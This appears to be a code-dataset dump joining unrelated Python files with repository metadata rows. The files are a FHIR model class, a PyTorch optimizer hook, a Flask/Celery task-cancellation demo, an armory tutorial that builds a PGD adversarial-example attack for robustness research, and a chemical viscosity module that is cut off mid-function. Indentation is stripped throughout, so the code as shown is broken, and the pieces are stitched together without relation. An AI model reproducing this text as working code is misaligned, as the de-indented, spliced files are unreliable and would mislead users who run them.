class EvidenceVariableCharacteristicTimeFromStart(backboneelement.BackboneElement):
"""Disclaimer: Any field name ends with ``__ext`` doesn't part of
Resource StructureDefinition, instead used to enable Extensibility feature
for FHIR Primitive Data Types.
Observation time from study start.
Indicates duration, period, or point of observation from the participant's
study entry.
"""
resource_type = Field("EvidenceVariableCharacteristicTimeFromStart", const=True)
description: fhirtypes.String = Field(
None,
alias="description",
title="Human readable description",
description="A short, natural language description.",
# if property is element of this resource.
element_property=True,
)
description__ext: fhirtypes.FHIRPrimitiveExtensionType = Field(
None, alias="_description", title="Extension field for ``description``."
)
note: typing.List[fhirtypes.AnnotationType] = Field(
None,
alias="note",
title="Used for footnotes or explanatory notes",
description=(
"A human-readable string to clarify or explain concepts about the "
"resource."
),
# if property is element of this resource.
element_property=True,
)
quantity: fhirtypes.QuantityType = Field(
None,
alias="quantity",
title=(
"Used to express the observation at a defined amount of time after the "
"study start"
),
description=None,
# if property is element of this resource.
element_property=True,
)
range: fhirtypes.RangeType = Field(
None,
alias="range",
title="Used to express the observation within a period after the study start",
description=None,
# if property is element of this resource.
element_property=True,
)
@classmethod
def elements_sequence(cls):
"""returning all elements names from
``EvidenceVariableCharacteristicTimeFromStart`` according specification,
with preserving original sequence order.
"""
return [
"id",
"extension",
"modifierExtension",
"description",
"quantity",
"range",
"note",
]
| ac71cd2ee4553db02ba1c6dfac5a5f46eafab65c | 689a78e08c957abc02ea5f89fb657b1f78f88b6e | /det3d/torchie/trainer/hooks/optimizer.py | 9a50e620af4705cb66732dd2551adc4618a13323 | ["MIT", "LicenseRef-scancode-proprietary-license", "LicenseRef-scancode-unknown-license-reference"] | permissive | tianweiy/CenterPoint | 2bb9a7def8d4bf87b66af2e3b671736eae6fa275 | d3a248fa56db2601860d576d5934d00fee9916eb | refs/heads/master | 2023-08-30T23:11:49.528882 | 2022-10-24T13:09:52 | 2022-10-24T13:09:52 | 274,006,091 | 1,692 | 476 | MIT | 2023-05-06T10:30:06 | 2020-06-22T00:32:05 | Python | UTF-8 | Python | false | false | 609 | py | optimizer.py |
from torch.nn.utils import clip_grad
from .hook import Hook
class OptimizerHook(Hook):
def __init__(self, grad_clip=None):
self.grad_clip = grad_clip
def clip_grads(self, params):
clip_grad.clip_grad_norm_(
filter(lambda p: p.requires_grad, params), **self.grad_clip
)
def after_train_iter(self, trainer):
trainer.optimizer.zero_grad()
# print(trainer.outputs["loss"])
trainer.outputs["loss"].backward()
if self.grad_clip is not None:
self.clip_grads(trainer.model.parameters())
trainer.optimizer.step()
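# --- Hedged usage sketch (editor's addition) ---
# ``grad_clip`` is forwarded as keyword arguments to
# torch.nn.utils.clip_grad.clip_grad_norm_, so a typical configuration is:
#
# >>> hook = OptimizerHook(grad_clip=dict(max_norm=35, norm_type=2))
# >>> # trainer.register_hook(hook)  # assuming the surrounding torchie trainer API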
| edda75b4b97058a66dbf7f5338ff4cbf8dc09dd6 | 6dfc23ef65e5943712340ef2b4b648cc25ea1fad | /2022/08/10/How to Cancel a Running Task in Celery/celery_example/app/myapp/__init__.py | 26b10e9d95f01165ed3a242c54c98733fca0b0b2 | ["Unlicense"] | permissive | PrettyPrinted/youtube_video_code | 6d265c910de18d780cdb99f7ea11b8b963929dc2 | 5654e5feba854d3b41b8dd75218e0221408e7831 | refs/heads/master | 2023-09-04T21:28:57.386174 | 2023-08-11T07:07:45 | 2023-08-11T07:07:45 | 186,743,986 | 698 | 2,347 | Unlicense | 2022-10-06T04:06:56 | 2019-05-15T03:40:45 | HTML | UTF-8 | Python | false | false | 1,206 | py | __init__.py |
from celery import Celery
from celery.contrib.abortable import AbortableTask
from flask import Flask, render_template
from time import sleep
def make_celery(app):
celery = Celery(app.name)
celery.conf.update(app.config["CELERY_CONFIG"])
class ContextTask(celery.Task):
def __call__(self, *args, **kwargs):
with app.app_context():
return self.run(*args, **kwargs)
celery.Task = ContextTask
return celery
def create_app():
app = Flask(__name__)
app.config.update(CELERY_CONFIG={
'broker_url': 'redis://redis',
'result_backend': 'redis://redis'
})
celery = make_celery(app)
@celery.task(bind=True, base=AbortableTask)
def count(self):
for i in range(10):
if self.is_aborted():
return 'Task stopped!'
print(i)
sleep(1)
return 'DONE!'
@app.route('/start')
def start():
task = count.delay()
return render_template('start.html', task=task)
@app.route('/cancel/<task_id>')
def cancel(task_id):
task = count.AsyncResult(task_id)
task.abort()
return 'Canceled!'
return app, celery
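# --- Hedged usage sketch (editor's addition) ---
# AbortableTask stores the abort flag in the result backend, so cancellation
# only takes effect because count() polls self.is_aborted() inside its loop.
# A typical interaction, assuming the Flask app runs on localhost:5000 with a
# Celery worker and Redis available:
#
#   $ curl http://localhost:5000/start             # response embeds task.id
#   $ curl http://localhost:5000/cancel/<task_id>  # -> 'Canceled!'; the worker returns 'Task stopped!'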
| ef87a393ab1bc476ed1e04cd620d97b21363e401 | bee4b8a10d36f6b9a2b9ec860129b4754449330c | /tutorials/adaptive_attacks/patch_loss_gradient.py | 418ff2b124b78af070bcfb79e72efe75899d6d90 | ["MIT"] | permissive | twosixlabs/armory | abe314ceacfd081b0bf269074d44cdc59748cd8e | 3efd21652cfdc8cd192681e9daf58a4b08e82db4 | refs/heads/master | 2023-07-19T17:31:30.729681 | 2023-07-03T15:30:23 | 2023-07-03T15:30:23 | 222,796,322 | 153 | 79 | MIT | 2023-09-05T17:17:03 | 2019-11-19T21:48:44 | Python | UTF-8 | Python | false | false | 1,460 | py | patch_loss_gradient.py |
from art.attacks.evasion import ProjectedGradientDescent
from patch_loss_gradient_model import get_art_model
import torch
from torch.autograd import Variable
from torchvision.transforms import RandomErasing
from armory.utils.evaluation import patch_method
DEVICE = torch.device("cuda" if torch.cuda.is_available() else "cpu")
class CustomAttack(ProjectedGradientDescent):
def __init__(self, estimator, **kwargs):
# Create copy of the model (to avoid overwriting loss_gradient of original model)
new_estimator = get_art_model(model_kwargs={}, wrapper_kwargs={})
new_estimator.model.load_state_dict(estimator.model.state_dict())
# OR:
# import copy
# new_estimator = copy.deepcopy(estimator)
# Point attack to copy of model
super().__init__(new_estimator, **kwargs)
@patch_method(new_estimator)
def loss_gradient(
self, x: "torch.Tensor", y: "torch.Tensor", **kwargs
) -> "torch.Tensor":
x_var = Variable(x, requires_grad=True)
y_cat = torch.argmax(y)
transform = RandomErasing(p=1.0, scale=(0.5, 0.5))
x_mod = torch.stack([transform(x_var[0]) for i in range(100)], dim=0)
logits = self.model.net.forward(x_mod)
loss = self._loss(logits, y_cat.repeat(100))
self._model.zero_grad()
loss.backward()
grads = x_var.grad
return grads
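# --- Hedged usage sketch (editor's addition) ---
# The patched loss_gradient evaluates the classification loss over 100
# randomly-erased copies of the input (an expectation-over-transformation style
# gradient), so PGD optimizes against the randomized masking rather than a
# single view. Typical use, with illustrative attack parameters:
#
# >>> attack = CustomAttack(estimator, eps=0.03, eps_step=0.007, max_iter=10)
# >>> x_adv = attack.generate(x=x_benign, y=y_labels)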
| 9c9521ecdba651fbd3d0284893e45f8b208b3b93 | 9ca55981d3245d87d45debce8e9825b60db43046 | /chemicals/viscosity.py | 3a1f00bfb25da247eed17bfed0798893a06a9849 | ["MIT", "LicenseRef-scancode-unknown-license-reference"] | permissive | CalebBell/chemicals | c6b1ebd409c32e0e1053c4f97668a8ebcc92b969 | 37e32a7c7f819e0cb8e2a8784f8448f68b9a4215 | refs/heads/master | 2023-07-25T23:34:17.754310 | 2023-07-25T02:00:14 | 2023-07-25T02:00:14 | 264,697,738 | 137 | 33 | MIT | 2022-06-05T18:21:02 | 2020-05-17T15:27:11 | Python | UTF-8 | Python | false | false | 100,177 | py | viscosity.py |
r"""Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, 2017, 2018, 2019, 2020 Caleb Bell
<Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
This module contains various viscosity estimation routines, dataframes
of fit coefficients, and mixing rules.
For reporting bugs, adding feature requests, or submitting pull requests,
please use the `GitHub issue tracker <https://github.com/CalebBell/chemicals/>`_.
.. contents:: :local:
Pure Low Pressure Liquid Correlations
-------------------------------------
.. autofunction:: chemicals.viscosity.Letsou_Stiel
.. autofunction:: chemicals.viscosity.Przedziecki_Sridhar
Pure High Pressure Liquid Correlations
--------------------------------------
.. autofunction:: chemicals.viscosity.Lucas
Liquid Mixing Rules
-------------------
No specific correlations are implemented but
:obj:`chemicals.utils.mixing_logarithmic` with weight fractions is the
recommended form.
Pure Low Pressure Gas Correlations
----------------------------------
.. autofunction:: chemicals.viscosity.Yoon_Thodos
.. autofunction:: chemicals.viscosity.Stiel_Thodos
.. autofunction:: chemicals.viscosity.Lucas_gas
.. autofunction:: chemicals.viscosity.viscosity_gas_Gharagheizi
Pure High Pressure Gas Correlations
-----------------------------------
No correlations are implemented yet.
Gas Mixing Rules
----------------
.. autofunction:: chemicals.viscosity.Herning_Zipperer
.. autofunction:: chemicals.viscosity.Brokaw
.. autofunction:: chemicals.viscosity.Wilke
.. autofunction:: chemicals.viscosity.Wilke_prefactors
.. autofunction:: chemicals.viscosity.Wilke_prefactored
.. autofunction:: chemicals.viscosity.Wilke_large
Correlations for Specific Substances
------------------------------------
.. autofunction:: chemicals.viscosity.mu_IAPWS
.. autofunction:: chemicals.viscosity.mu_air_lemmon
Petroleum Correlations
----------------------
.. autofunction:: chemicals.viscosity.Twu_1985
.. autofunction:: chemicals.viscosity.Lorentz_Bray_Clarke
Fit Correlations
----------------
.. autofunction:: chemicals.viscosity.PPDS9
.. autofunction:: chemicals.viscosity.dPPDS9_dT
.. autofunction:: chemicals.viscosity.PPDS5
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_2
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_2_exponential
.. autofunction:: chemicals.viscosity.Viswanath_Natarajan_3
.. autofunction:: chemicals.viscosity.mu_Yaws
.. autofunction:: chemicals.viscosity.dmu_Yaws_dT
.. autofunction:: chemicals.viscosity.mu_Yaws_fitting_jacobian
.. autofunction:: chemicals.viscosity.mu_TDE
Conversion functions
--------------------
.. autofunction:: chemicals.viscosity.viscosity_converter
.. autofunction:: chemicals.viscosity.viscosity_index
Fit Coefficients
----------------
All of these coefficients are lazy-loaded, so they must be accessed as an
attribute of this module.
.. data:: mu_data_Dutt_Prasad
    Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_3` from [1]_
for 100 fluids.
.. data:: mu_data_VN3
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_3` from [1]_
with data for 432 fluids.
.. data:: mu_data_VN2
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_2` from [1]_
with data for 135 fluids.
.. data:: mu_data_VN2E
Coefficients for :obj:`chemicals.viscosity.Viswanath_Natarajan_2_exponential`
from [1]_ with data for 14 fluids.
.. data:: mu_data_Perrys_8E_2_313
A collection of 337 coefficient sets for :obj:`chemicals.dippr.EQ101` from the
DIPPR database published openly in [3]_.
.. data:: mu_data_Perrys_8E_2_312
A collection of 345 coefficient sets for :obj:`chemicals.dippr.EQ102` from the
DIPPR database published openly in [3]_.
.. data:: mu_data_VDI_PPDS_7
Coefficients for the model equation :obj:`PPDS9`, published openly in [2]_.
Provides no temperature limits, but has been designed
    for extrapolation. Extrapolated to low temperatures, it provides a
    smooth exponential increase. However, for some chemicals such as
    glycerol, the predicted viscosity increases again above a certain
    temperature when extrapolated upward.
.. data:: mu_data_VDI_PPDS_8
    Coefficients for a temperature polynomial (T in Kelvin) developed by the
PPDS, published openly in [2]_. :math:`\mu = A + BT + CT^2 + DT^3 + ET^4`.
.. [1] Viswanath, Dabir S., and G. Natarajan. Databook On The Viscosity Of
Liquids. New York: Taylor & Francis, 1989
.. [2] Gesellschaft, V. D. I., ed. VDI Heat Atlas. 2nd edition.
Berlin; New York:: Springer, 2010.
.. [3] Green, Don, and Robert Perry. Perry's Chemical Engineers' Handbook,
Eighth Edition. McGraw-Hill Professional, 2007.
The structure of each dataframe is shown below:
.. ipython::
In [1]: import chemicals
In [2]: chemicals.viscosity.mu_data_Dutt_Prasad
In [3]: chemicals.viscosity.mu_data_VN3
In [4]: chemicals.viscosity.mu_data_VN2
In [5]: chemicals.viscosity.mu_data_VN2E
In [6]: chemicals.viscosity.mu_data_Perrys_8E_2_313
In [7]: chemicals.viscosity.mu_data_Perrys_8E_2_312
In [8]: chemicals.viscosity.mu_data_VDI_PPDS_7
In [9]: chemicals.viscosity.mu_data_VDI_PPDS_8
"""
__all__ = ['Viswanath_Natarajan_3','Letsou_Stiel', 'Przedziecki_Sridhar', 'PPDS9', 'dPPDS9_dT',
'Viswanath_Natarajan_2', 'Viswanath_Natarajan_2_exponential', 'Lucas', 'Brokaw',
'mu_TDE',
'Yoon_Thodos', 'Stiel_Thodos', 'Lucas_gas', 'viscosity_gas_Gharagheizi', 'Herning_Zipperer',
'Wilke', 'Wilke_prefactors', 'Wilke_prefactored', 'Wilke_large', 'mu_Yaws', 'dmu_Yaws_dT', 'mu_Yaws_fitting_jacobian',
'viscosity_index', 'viscosity_converter', 'Lorentz_Bray_Clarke', 'Twu_1985', 'mu_IAPWS', 'mu_air_lemmon',
'PPDS5']
from math import acos, atan, tan
from fluids.numerics import exp, interp, log, secant, sin, sqrt, trunc_exp
from fluids.numerics import numpy as np
from chemicals.data_reader import data_source, register_df_source
from chemicals.utils import PY37, can_load_data, mark_numba_incompatible, os_path_join, source_path
folder = os_path_join(source_path, 'Viscosity')
register_df_source(folder, 'Dutt Prasad 3 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'C': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 3 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'C': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 2 term.tsv', csv_kwargs={
'dtype':{'A': float, 'B': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Viswanath Natarajan Dynamic 2 term Exponential.tsv', csv_kwargs={
'dtype':{'C': float, 'D': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'Table 2-313 Viscosity of Inorganic and Organic Liquids.tsv')
register_df_source(folder, 'Table 2-312 Vapor Viscosity of Inorganic and Organic Substances.tsv', csv_kwargs={
'dtype':{'C1': float, 'C2': float, 'C3': float, 'C4': float, 'Tmin': float, 'Tmax': float}})
register_df_source(folder, 'VDI PPDS Dynamic viscosity of saturated liquids polynomials.tsv', csv_kwargs={'float_precision': 'legacy'})
register_df_source(folder, 'VDI PPDS Dynamic viscosity of gases polynomials.tsv', csv_kwargs={'float_precision': 'legacy'})
_mu_data_loaded = False
@mark_numba_incompatible
def _load_mu_data():
global _mu_data_loaded, mu_data_Dutt_Prasad, mu_values_Dutt_Prasad
global mu_data_VN3, mu_values_VN3, mu_data_VN2, mu_values_VN2
global mu_data_VN2E, mu_values_VN2E, mu_data_Perrys_8E_2_313, mu_values_Perrys_8E_2_313
global mu_data_Perrys_8E_2_312, mu_values_Perrys_8E_2_312
global mu_data_VDI_PPDS_7, mu_values_PPDS_7, mu_data_VDI_PPDS_8, mu_values_PPDS_8
mu_data_Dutt_Prasad = data_source('Dutt Prasad 3 term.tsv')
mu_values_Dutt_Prasad = np.array(mu_data_Dutt_Prasad.values[:, 1:], dtype=float)
mu_data_VN3 = data_source('Viswanath Natarajan Dynamic 3 term.tsv')
mu_values_VN3 = np.array(mu_data_VN3.values[:, 2:], dtype=float)
mu_data_VN2 = data_source('Viswanath Natarajan Dynamic 2 term.tsv')
mu_values_VN2 = np.array(mu_data_VN2.values[:, 2:], dtype=float)
mu_data_VN2E = data_source('Viswanath Natarajan Dynamic 2 term Exponential.tsv')
mu_values_VN2E = np.array(mu_data_VN2E.values[:, 2:], dtype=float)
mu_data_Perrys_8E_2_313 = data_source('Table 2-313 Viscosity of Inorganic and Organic Liquids.tsv')
mu_values_Perrys_8E_2_313 = np.array(mu_data_Perrys_8E_2_313.values[:, 1:], dtype=float)
mu_data_Perrys_8E_2_312 = data_source('Table 2-312 Vapor Viscosity of Inorganic and Organic Substances.tsv')
mu_values_Perrys_8E_2_312 = np.array(mu_data_Perrys_8E_2_312.values[:, 1:], dtype=float)
mu_data_VDI_PPDS_7 = data_source('VDI PPDS Dynamic viscosity of saturated liquids polynomials.tsv')
mu_values_PPDS_7 = np.array(mu_data_VDI_PPDS_7.values[:, 2:], dtype=float)
mu_data_VDI_PPDS_8 = data_source('VDI PPDS Dynamic viscosity of gases polynomials.tsv')
mu_values_PPDS_8 = np.array(mu_data_VDI_PPDS_8.values[:, 1:], dtype=float)
_mu_data_loaded = True
if PY37:
def __getattr__(name):
if name in ('mu_data_Dutt_Prasad', 'mu_values_Dutt_Prasad', 'mu_data_VN3',
'mu_values_VN3', 'mu_data_VN2', 'mu_values_VN2', 'mu_data_VN2E',
'mu_values_VN2E', 'mu_data_Perrys_8E_2_313', 'mu_values_Perrys_8E_2_313',
'mu_data_Perrys_8E_2_312', 'mu_values_Perrys_8E_2_312', 'mu_data_VDI_PPDS_7',
'mu_values_PPDS_7', 'mu_data_VDI_PPDS_8', 'mu_values_PPDS_8'):
_load_mu_data()
return globals()[name]
raise AttributeError(f"module {__name__} has no attribute {name}")
else:
if can_load_data:
_load_mu_data()
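# --- Hedged usage note (editor's addition) ---
# On Python 3.7+ the module-level __getattr__ above (PEP 562) defers loading the
# coefficient dataframes until one is first accessed, e.g.:
#
# >>> import chemicals.viscosity as viscosity
# >>> viscosity.mu_data_Dutt_Prasad.shape  # first access triggers _load_mu_data()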
def mu_IAPWS(T, rho, drho_dP=None, drho_dP_Tr=None):
r'''Calculates and returns the viscosity of water according to the IAPWS
(2008) release.
Viscosity is calculated as a function of three terms;
the first is the dilute-gas limit; the second is the contribution due to
finite density; and the third and most complex is a critical enhancement
term.
.. math::
\mu = \mu_0 \cdot \mu_1(T, \rho)
\cdot \mu_2(T, \rho)
.. math::
\mu_0(T) = \frac{100\sqrt{T}}{\sum_{i=0}^3 \frac{H_i}{T^i}}
.. math::
\mu_1(T, \rho) = \exp\left[\rho \sum_{i=0}^5
\left(\left(\frac{1}{T} - 1 \right)^i
\sum_{j=0}^6 H_{ij}(\rho - 1)^j\right)\right]
.. math::
\text{if }\xi < 0.3817016416 \text{ nm:}
.. math::
Y = 0.2 q_c \xi(q_D \xi)^5 \left(1 - q_c\xi + (q_c\xi)^2 -
\frac{765}{504}(q_D\xi)^2\right)
.. math::
\text{else:}
.. math::
Y = \frac{1}{12}\sin(3\psi_D) - \frac{1}{4q_c \xi}\sin(2\psi_D) +
\frac{1}{(q_c\xi)^2}\left[1 - 1.25(q_c\xi)^2\right]\sin(\psi_D)
- \frac{1}{(q_c\xi)^3}\left\{\left[1 - 1.5(q_c\xi)^2\right]\psi_D
- \left|(q_c\xi)^2 - 1\right|^{1.5}L(w)\right\}
.. math::
w = \left| \frac{q_c \xi -1}{q_c \xi +1}\right|^{0.5} \tan\left(
\frac{\psi_D}{2}\right)
.. math::
L(w) = \ln\frac{1 + w}{1 - w} \text{ if }q_c \xi > 1
.. math::
L(w) = 2\arctan|w| \text{ if }q_c \xi \le 1
.. math::
\psi_D = \arccos\left[\left(1 + q_D^2 \xi^2\right)^{-0.5}\right]
.. math::
\Delta \bar\chi(\bar T, \bar \rho) = \bar\rho\left[\zeta(\bar T, \bar
\rho) - \zeta(\bar T_R, \bar \rho)\frac{\bar T_R}{\bar T}\right]
.. math::
\xi = \xi_0 \left(\frac{\Delta \bar\chi}{\Gamma_0}\right)^{\nu/\gamma}
.. math::
\zeta = \left(\frac{\partial\bar\rho}{\partial \bar p}\right)_{\bar T}
Parameters
----------
T : float
Temperature of water [K]
rho : float
Density of water [kg/m^3]
drho_dP : float, optional
Partial derivative of density with respect to pressure at constant
temperature (at the temperature and density of water), [kg/m^3/Pa]
drho_dP_Tr : float, optional
Partial derivative of density with respect to pressure at constant
temperature (at the reference temperature (970.644 K) and the actual
density of water), [kg/m^3/Pa]
Returns
-------
mu : float
Viscosity, [Pa*s]
Notes
-----
There are three ways to use this formulation.
1) Compute the Industrial formulation value which does not include the
    critical enhancement, by leaving `drho_dP` and `drho_dP_Tr` None.
2) Compute the Scientific formulation value by accurately computing and
providing `drho_dP` and `drho_dP_Tr`, both with IAPWS-95.
3) Get a non-standard but 8 decimal place matching result by providing
`drho_dP` computed with either IAPWS-95 or IAPWS-97, but not providing
`drho_dP_Tr`; which is calculated internally. There is a formulation
for that term in the thermal conductivity IAPWS equation which is used.
xmu = 0.068
qc = (1.9E-9)**-1
qd = (1.1E-9)**-1
nu = 0.630
gamma = 1.239
xi0 = 0.13E-9
Gamma0 = 0.06
TRC = 1.5
    This formulation is highly optimized, spending most of its time in the
logarithm, power, and square root.
Examples
--------
>>> mu_IAPWS(298.15, 998.)
0.000889735100149808
>>> mu_IAPWS(1173.15, 400.)
6.415460784836147e-05
Point 4 of formulation, compared with MPEI and IAPWS, matches.
>>> mu_IAPWS(T=647.35, rho=322., drho_dP=1.213641949033E-2)
4.2961578738287e-05
Full scientific calculation:
>>> from chemicals.iapws import iapws95_properties, iapws95_P, iapws95_Tc
>>> T, P = 298.15, 1e5
>>> rho, _, _, _, _, _, _, _, _, _, drho_dP = iapws95_properties(T, P)
>>> P_ref = iapws95_P(1.5*iapws95_Tc, rho)
>>> _, _, _, _, _, _, _, _, _, _, drho_dP_Tr = iapws95_properties(1.5*iapws95_Tc, P_ref)
>>> mu_IAPWS(T, rho, drho_dP, drho_dP_Tr)
0.00089002267377
References
----------
.. [1] Huber, M. L., R. A. Perkins, A. Laesecke, D. G. Friend, J. V.
Sengers, M. J. Assael, I. N. Metaxa, E. Vogel, R. Mares, and
K. Miyagawa. "New International Formulation for the Viscosity of H2O."
Journal of Physical and Chemical Reference Data 38, no. 2
(June 1, 2009): 101-25. doi:10.1063/1.3088050.
'''
Tr = T*0.0015453657571674064 #/647.096
Tr_inv = 1.0/Tr
rhor = rho*0.003105590062111801 #1/322.
x0 = rhor - 1.
x1 = Tr_inv - 1.
# His = [1.67752, 2.20462, 0.6366564, -0.241605]
# mu0 = 0
# for i in range(4):
# mu0 += His[i]/Tr**i
mu0 = 100.0*sqrt(Tr)/(Tr_inv*(Tr_inv*(0.6366564 - 0.241605*Tr_inv) + 2.20462) + 1.67752)
# i_coefs = [0, 0, 0, 0, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 4, 4, 5, 6, 6]
# j_coef = [0, 1, 2, 3, 0, 1, 2, 3, 5, 0, 1, 2, 3, 4, 0, 1, 0, 3, 4, 3, 5]
# Hijs = [0.520094, .0850895, -1.08374, -0.289555, 0.222531, 0.999115,
# 1.88797, 1.26613, 0.120573, -0.281378, -0.906851, -0.772479,
# -0.489837, -0.257040, 0.161913, 0.257399, -0.0325372, 0.0698452,
# 0.00872102, -0.00435673, -0.000593264]
# tot = 0
# for i in range(21):
# tot += Hijs[i]*(rhor - 1.)**i_coefs[i]*(Tr_inv - 1.)**j_coef[i]
x02 = x0*x0
tot = (x0*(x0*(x0*(0.161913 - 0.0325372*x0) - 0.281378) + 0.222531)
+ x1*(x0*(x0*(0.257399*x0 - 0.906851) + 0.999115) + x1*(x0*(1.88797 - 0.772479*x0)
+ x1*(x0*(x0*(x02*(0.0698452 - 0.00435673*x02) - 0.489837) + 1.26613)
+ x1*(x02*(0.00872102*x0*x02 - 0.25704) + x0*x1*(0.120573 - 0.000593264*x02*x02*x0)) - 0.289555)
- 1.08374) + 0.0850895) + 0.520094)
mu1 = exp(rhor*tot)
if drho_dP is not None:
xmu = 0.068
qc = 526315789.4736842#(1.9E-9)**-1
qD = 909090909.0909091#(1.1E-9)**-1
# nu = 0.630
# gamma = 1.239
xi0 = 0.13E-9
# Gamma0 = 0.06
TRC = 1.5
# Not a perfect match because of
zeta_drho_dP = drho_dP*68521.73913043478 #22.064E6/322.0
if drho_dP_Tr is None:
            # Branch needed to allow scientific points to work
if rhor <= 0.310559006:
tot1 = (rhor*(rhor*(rhor*(rhor*(1.97815050331519*rhor + 10.2631854662709) - 2.27492629730878)
+ 3.39624167361325) - 5.61149954923348) + 6.53786807199516)
elif rhor <= 0.776397516:
tot1 = (rhor*(rhor*(rhor*(rhor*(12.1358413791395 - 5.54349664571295*rhor) - 9.82240510197603)
+ 8.08379285492595) - 6.30816983387575) + 6.52717759281799)
elif rhor <= 1.242236025:
tot1 = (rhor*(rhor*(rhor*(rhor*(9.19494865194302 - 2.16866274479712*rhor) - 12.033872950579)
+ 8.91990208918795) - 3.96415689925446) + 5.35500529896124)
elif rhor <= 1.863354037:
tot1 = (rhor*(rhor*(rhor*(rhor*(6.1678099993336 - 0.965458722086812*rhor) - 11.0321960061126)
+ 8.93237374861479) + 0.464621290821181) + 1.55225959906681)
else:
tot1 = (rhor*(rhor*(rhor*(rhor*(4.66861294457414 - 0.503243546373828*rhor) - 10.325505114704)
+ 9.8895256507892) + 0.595748562571649) + 1.11999926419994)
drho_dP_Tr2 = 1./tot1
else:
drho_dP_Tr2 = drho_dP_Tr*68521.73913043478 #22.064E6/322.0
dchi = rhor*(zeta_drho_dP - drho_dP_Tr2*TRC*Tr_inv)
if dchi < 0.0:
# By definition
return mu0*mu1*1e-6
# 16.666 = 1/Gamma0
xi = xi0*(dchi*16.666666666666668)**0.5084745762711864 #(nu/gamma)
qD2 = qD*qD
xi2 = xi*xi
x2 = qD2*xi2
psiD = acos(1.0/sqrt(1.0 + x2))
qcxi = qc*xi
qcxi2 = qcxi*qcxi
qcxi_inv = 1.0/qcxi
w = sqrt(abs((qcxi - 1.0)/(qcxi + 1.0)))*tan(psiD*0.5)
if qc*xi > 1.0:
Lw = log((1.0 + w)/(1.0 - w))
else:
Lw = 2.0*atan(w)
if xi <= 0.381706416E-9:
# 1.5178571428571428 = 765./504
Y = 0.2*qcxi*x2*x2*qD*xi*(1.0 - qcxi + qcxi2 - 1.5178571428571428*x2)
else:
# sin(ax) = 2cos(ax/2)*sin(ax/2)
# It would be possible to compute the sin(2psiD) and sin(psiD) together with a sincos
# operation, but not the sin(3psid)
x3 = (abs(qcxi2 - 1.0))
Y = (1/12.*sin(3.0*psiD) + (-0.25*sin(2.0*psiD)
+((1.0 - 1.25*qcxi2)*sin(psiD)
-qcxi_inv*((1.0 - 1.5*qcxi2)*psiD - x3*sqrt(x3)*Lw))*qcxi_inv)*qcxi_inv )
mu2 = exp(xmu*Y)
else:
mu2 = 1.0
mu = mu0*mu1*mu2*1e-6
return mu
def mu_air_lemmon(T, rho):
r'''Calculates and returns the viscosity of air according to Lemmon
and Jacobsen (2003) [1]_.
Viscosity is calculated as a function of two terms;
the first is the dilute-gas limit; the second is the contribution due to
finite density.
.. math::
\mu = \mu^0(T) + \mu^r(T, \rho)
.. math::
\mu^0(T) = \frac{0.9266958\sqrt{MT}}{\sigma^2 \Omega(T^*)}
.. math::
\Omega(T^*) = \exp\left( \sum_{i=0}^4 b_i [\ln(T^*)]^i \right)
.. math::
\mu^r = \sum_{i=1}^n N_i \tau^{t_i} \delta^{d_i} \exp\left(
-\gamma_i \delta^{l_i}\right)
Parameters
----------
T : float
Temperature of air [K]
rho : float
Molar density of air [mol/m^3]
Returns
-------
mu : float
Viscosity of air, [Pa*s]
Notes
-----
The coefficients are:
Ni = [10.72, 1.122, 0.002019, -8.876, -0.02916]
ti = [0.2, 0.05, 2.4, 0.6, 3.6]
di = [1, 4, 9, 1, 8]
gammai = Ii = [0, 0, 0, 1, 1]
bi = [.431, -0.4623, 0.08406, 0.005341, -0.00331]
The reducing parameters are :math:`T_c = 132.6312` K and
:math:`\rho_c = 10447.7` mol/m^3. Additional parameters used are
:math:`\sigma = 0.36` nm,
:math:`M = 28.9586` g/mol and :math:`\frac{e}{k} = 103.3` K.
This is an implementation optimized for speed, spending its time
    in the calculation of 1 log; 2 exp; 1 power; and 2 divisions.
Examples
--------
Viscosity at 300 K and 1 bar:
>>> mu_air_lemmon(300.0, 40.10292351061862)
1.85371518556e-05
    Calculating the density in the same call:
>>> from chemicals.air import lemmon2000_rho
>>> mu_air_lemmon(300.0, lemmon2000_rho(300.0, 1e5))
1.85371518556e-05
References
----------
.. [1] Lemmon, E. W., and R. T. Jacobsen. "Viscosity and Thermal
Conductivity Equations for Nitrogen, Oxygen, Argon, and Air."
International Journal of Thermophysics 25, no. 1 (January 1, 2004):
21-69. https://doi.org/10.1023/B:IJOT.0000022327.04529.f3.
'''
# Cost: 1 log; 2 exp; 1 power; 2 divisions
# sigma = 0.360 # nm
# M = 28.9586 # g/mol
# rhoc = 10447.7 # mol/m^3, maxcondentherm actually
Tc = 132.6312 # K, maxcondentherm actually
tau = Tc/T
delta = rho*9.571484632981421e-05 # 9.57...E-5 = 1/10447.7
delta2 = delta*delta
delta4 = delta2*delta2
delta8 = delta4*delta4
